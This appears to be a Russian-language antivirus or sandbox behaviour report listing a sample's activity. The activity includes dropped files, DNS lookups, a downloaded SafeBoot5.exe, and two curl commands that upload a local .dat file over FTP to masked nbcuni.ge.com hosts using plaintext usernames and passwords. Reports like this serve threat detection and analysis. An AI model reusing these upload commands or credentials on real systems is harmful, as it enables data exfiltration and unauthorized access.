Техническая информация
- %TEMP%\curl.exe -m 10 -T "C:\USGDat\SBInstall_Shell.dat" --ftp-create-dirs -u gdeftp:nbcUn1gd3 ftp://gd####.nbcuni.ge.com/datfiles/Utilities/SafeBoot/SafeBoot5/Shell/CRNJEUFU.dat
- %TEMP%\curl.exe -m 10 -T "C:\USGDat\SBInstall_Shell.dat" --ftp-create-dirs -u gdeuser:Pa55w0rd ftp://gd#####.nbcuni.ge.com/Utilities/SafeBoot/SafeBoot5/Shell/CRNJEUFU.dat
- %TEMP%\SafeBoot5\SafeBoot5.exe /core
- %TEMP%\SafeBoot5\SafeBoot5.exe (загружен из сети Интернет)
- C:\USGDat\SBInstall_Shell.dat
- %TEMP%\aut2.tmp
- %TEMP%\curl.exe
- %TEMP%\SafeBoot5\SafeBoot5.exe
- %TEMP%\aut1.tmp
- %PROGRAM_FILES%\NBCU_Tools\Shared\NBCU_Logo.bmp
- %HOMEPATH%\Local Settings\Temporary Internet Files\Content.IE5\KHMHGZ4F\SafeBoot5[1].exe
- %TEMP%\aut2.tmp
- %TEMP%\aut1.tmp
- 'gd#####.nbcuni.ge.com':21
- 'gd####.nbcuni.ge.com':21
- 'sm#.##cuni.ge.com':80
- sm#.##cuni.ge.com/datalib/SafeBoot5.exe
- DNS ASK gd#####.nbcuni.ge.com
- DNS ASK gd####.nbcuni.ge.com
- DNS ASK sm#.##cuni.ge.com